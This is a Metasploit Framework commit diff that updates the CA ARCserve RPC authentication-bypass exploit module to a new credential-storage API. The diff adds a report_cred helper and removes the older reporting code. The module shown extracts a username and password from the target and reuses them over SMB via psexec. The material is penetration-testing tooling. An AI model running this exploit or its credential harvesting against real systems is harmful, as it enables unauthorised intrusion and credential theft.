Land #5478, @wchen-r7 Updates ca_arcserve_rpc_authbypass to use the new cred API

2015-06-19 10:21:14 -05:00 · 2015-06-19 10:21:14 -05:00 · 1c357e6b3c
parent b349549754 0f17f622c3
commit 1c357e6b3c
1 changed files with 47 additions and 12 deletions
--- a/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb
+++ b/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb
@ -58,6 +58,33 @@ class Metasploit3 < Msf::Exploit::Remote
      ], self.class )
  end

+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      module_fullname: fullname,
+      post_reference_name: self.refname,
+      private_data: opts[:password],
+      origin_type: :service,
+      private_type: :password,
+      username: opts[:user]
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: opts[:status],
+      last_attempted_at: DateTime.now
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
  def exploit
    print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")

@ -104,18 +131,6 @@ class Metasploit3 < Msf::Exploit::Remote
      pass = resp[pass_index+1].gsub(/\"/, "")
    end

-    # report the auth
-    auth = {
-        :host   => datastore['RHOST'],
-        :port   => 445,
-        :sname  => 'smb',
-        :proto  => 'tcp',
-        :user   => user,
-        :pass   => pass,
-        :active => true
-      }
-    report_auth_info(auth)
-
    srvc = {
        :host   => datastore['RHOST'],
        :port   => datastore['RPORT'],
@ -159,11 +174,31 @@ class Metasploit3 < Msf::Exploit::Remote
        'RunAsJob' => true
      )
    rescue
+      report_cred(
+        ip: datastore['RHOST'],
+        port: 445,
+        service_name: 'smb',
+        user: user,
+        password: pass,
+        status: Metasploit::Model::Login::Status::INCORRECT
+      )
+
      print_status("Login attempt using windows/smb/psexec failed")
      print_status("Credentials have been stored and may be useful for authentication against other services.")
+      # report the auth
      return
    end

+    # report the auth
+    report_cred(
+      ip: datastore['RHOST'],
+      port: 445,
+      service_name: 'smb',
+      user: user,
+      password: pass,
+      status: Metasploit::Model::Login::Status::SUCCESSFUL
+    )
+
    handler
  end
 end